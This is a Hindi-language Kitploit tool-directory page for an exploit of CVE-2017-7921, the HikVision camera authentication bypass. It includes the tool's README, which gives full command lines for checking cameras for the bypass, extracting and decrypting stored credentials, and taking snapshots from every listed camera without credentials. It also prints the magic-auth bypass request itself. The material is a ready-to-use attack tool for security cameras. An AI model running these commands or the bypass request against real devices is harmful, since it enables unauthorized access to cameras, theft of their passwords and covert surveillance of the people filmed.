Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-7921 — HikVision Auth Bypass CVE, यह उपकरण क्रेडेंशियल्स निकालने तथा मैजिक कुकी या प्रदान किए गए क्रेडेंशियल्स के आधार पर स्नैपशॉट लेने में सक्षम है। | Kitploit
उपकरण/GitHubGitHub/mverschu/cve-2017-7921
टोहीIoT सुरक्षापासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाप्रमाणीकरण
GitHubmverschu/cve-2017-7921

CVE-2017-7921

HikVision Auth Bypass CVE, यह उपकरण क्रेडेंशियल्स निकालने तथा मैजिक कुकी या प्रदान किए गए क्रेडेंशियल्स के आधार पर स्नैपशॉट लेने में सक्षम है।

रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Hikvision कैमरा लिस्टर और स्नैपशॉट टूल

एक स्टैंडअलोन टूल जो एक फ़ाइल से Hikvision कैमरों को सूचीबद्ध करता है और मान्य क्रेडेंशियल (HTTP Basic या Digest auth) या CVE auth bypass का उपयोग करके प्रत्येक से स्नैपशॉट लेता है। परीक्षण के लिए किसी अन्य होस्ट पर चलाने का इरादा है।

विशेषताएँ

  • कैमरों की सूची एक टेक्स्ट फ़ाइल से (प्रति पंक्ति एक host या host:port)।
  • जाँच (CVE) – प्रत्येक कैमरे पर magic auth bypass CVE की जाँच करें (कोई क्रेडेंशियल नहीं); कमजोर डिवाइसों के लिए वैकल्पिक --save-snapshot।
  • क्रेडेंशियल – CVE के माध्यम से प्रत्येक कैमरे से उपयोगकर्ता/पासवर्ड निकालें (magic auth + config decrypt)। OpenSSL की आवश्यकता है।
  • Auth check – सत्यापित करें कि उपयोगकर्ता नाम/पासवर्ड प्रत्येक कैमरे द्वारा स्वीकार किए जाते हैं (कोई स्नैपशॉट सहेजा नहीं जाता)।
  • सभी कैमरों का स्नैपशॉट – प्रति कैमरा एक छवि प्राप्त करता है (मान्य क्रेडेंशियल, या बिना क्रेडेंशियल के CVE bypass उपयोग करने के लिए --exploit)।
  • समवर्ती अनुरोध (कॉन्फ़िगर करने योग्य workers)।
  • वैकल्पिक HTTP Digest auth; एक overview छवि बनाने के लिए वैकल्पिक --merge। निर्भरताएँ: requests, Pillow (--merge के लिए)।

आवश्यकताएँ

  • Python 3.8+
  • requests

स्थापना

root@kitploit:~
pip install -r requirements.txt

कैमरा सूची फ़ाइल

एक टेक्स्ट फ़ाइल बनाएँ जिसमें प्रति पंक्ति एक कैमरा हो। # से शुरू होने वाली टिप्पणियाँ अनदेखा की जाती हैं।

root@kitploit:~
# Example cameras.txt
192.168.1.100
192.168.1.101:80
nvr.local:8080

उपयोग

कैमरों की सूची

फ़ाइल से पढ़े गए कैमरों को प्रिंट करें (कोई क्रेडेंशियल आवश्यक नहीं)।

root@kitploit:~
python hikvision_snapshots.py cameras.txt list

वैकल्पिक पहुँच जाँच (प्रत्येक होस्ट पर HTTP GET):

root@kitploit:~
python hikvision_snapshots.py cameras.txt list -v

जाँच (CVE)

प्रत्येक कैमरे पर Hikvision snapshot auth-bypass CVE की जाँच करें। कोई क्रेडेंशियल आवश्यक नहीं।

root@kitploit:~
python hikvision_snapshots.py cameras.txt check

केवल कमजोर कैमरों के लिए स्नैपशॉट सहेजें:

root@kitploit:~
python hikvision_snapshots.py cameras.txt check --save-snapshot -o ./vuln_snapshots

विकल्प: --timeout, --workers, -o (--save-snapshot के लिए)।

क्रेडेंशियल निकालना

प्रत्येक कैमरे से CVE के माध्यम से क्रेडेंशियल निकालें (magic auth से उपयोगकर्ता सूची और config फ़ाइल प्राप्त करें, फिर config डिक्रिप्ट करें)। होस्ट पर OpenSSL आवश्यक है। चलाने के लिए कोई क्रेडेंशियल आवश्यक नहीं।

root@kitploit:~
python hikvision_snapshots.py cameras.txt credentials

विकल्प: --timeout, --workers।

प्रमाणीकरण जाँच

सत्यापित करें कि आपके क्रेडेंशियल प्रत्येक कैमरे पर काम करते हैं (समान snapshot endpoints का उपयोग करता है; छवियाँ सहेजता नहीं)।

root@kitploit:~
python hikvision_snapshots.py cameras.txt auth-check -u admin -p YourPassword

विकल्प: --timeout, --workers, --digest (snapshot के समान)।

सभी कैमरों का स्नैपशॉट

प्रति कैमरा एक स्नैपशॉट लें और JPEG के रूप में सहेजें। या तो मान्य क्रेडेंशियल या --exploit (CVE auth bypass, कोई क्रेडेंशियल नहीं) का उपयोग करें।

root@kitploit:~
# With credentials
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword

# With CVE exploit (no credentials)
python hikvision_snapshots.py cameras.txt snapshot --exploit
  • स्नैपशॉट डिफ़ॉल्ट रूप से snapshots/ के अंतर्गत सहेजे जाते हैं (बदलने के लिए -o उपयोग करें)।
  • फ़ाइल नाम host या host_port से लिए जाते हैं (जैसे 192_168_1_100.jpg, nvr_local_8080.jpg)।

विकल्प:

--merge के साथ, प्रत्येक स्नैपशॉट सहेजने के बाद टूल आउटपुट निर्देशिका में प्रति कैमरा एक सेल और एक लेबल के साथ एक एकल ग्रिड छवि (overview.jpg) बनाता है। इसके लिए Pillow की आवश्यकता है (pip install Pillow)।

कस्टम आउटपुट और Digest auth के साथ उदाहरण:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p secret -o ./images --digest --timeout 20

मर्ज की गई overview छवि के साथ उदाहरण:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword --merge
# or with exploit (no creds):
python hikvision_snapshots.py cameras.txt snapshot --exploit --merge -o ./out

एंडपॉइंट्स

प्रमाणित स्नैपशॉट (क्रेडेंशियल के साथ): स्क्रिप्ट क्रम से प्रयास करती है – /ISAPI/Streaming/channels/1/picture, /ISAPI/Streaming/channels/101/picture, /onvif-http/snapshot।

CVE (check / --exploit): /onvif-http/snapshot?auth=YWRtaW46MTEK (magic auth bypass, कोई क्रेडेंशियल नहीं)।

किसी अन्य होस्ट पर चलाना

  1. hikvision_snapshots.py, requirements.txt और अपनी कैमरा सूची फ़ाइल होस्ट पर कॉपी करें।
  2. स्थापित करें: pip install -r requirements.txt
  3. फ़ाइल सत्यापित करने के लिए list चलाएँ; CVE के लिए check, क्रेडेंशियल के लिए auth-check, या snapshot (-u/-p या --exploit के साथ) उपयोग करें।

सुनिश्चित करें कि होस्ट के पास सभी कैमरा IP और पोर्ट तक नेटवर्क पहुँच है।

टूल डाउनलोड करें
विकल्पविवरणडिफ़ॉल्ट
-u, --usernameकैमरा उपयोगकर्ता नाम--exploit के अलावा अनिवार्य
-p, --passwordकैमरा पासवर्ड--exploit के अलावा अनिवार्य
--exploitCVE magic auth bypass उपयोग करें (कोई क्रेडेंशियल नहीं)बंद
-o, --output-dirस्नैपशॉट छवियों के लिए निर्देशिकाsnapshots
--timeoutHTTP timeout सेकंड में15
--workersसमवर्ती स्नैपशॉट अनुरोधों की संख्या10
--digestBasic के बजाय HTTP Digest auth उपयोग करेंबंद
--mergeसभी स्नैपशॉट को एक overview छवि में मर्ज करेंबंद
--merge-columnsमर्ज के लिए ग्रिड कॉलम (डिफ़ॉल्ट: auto)auto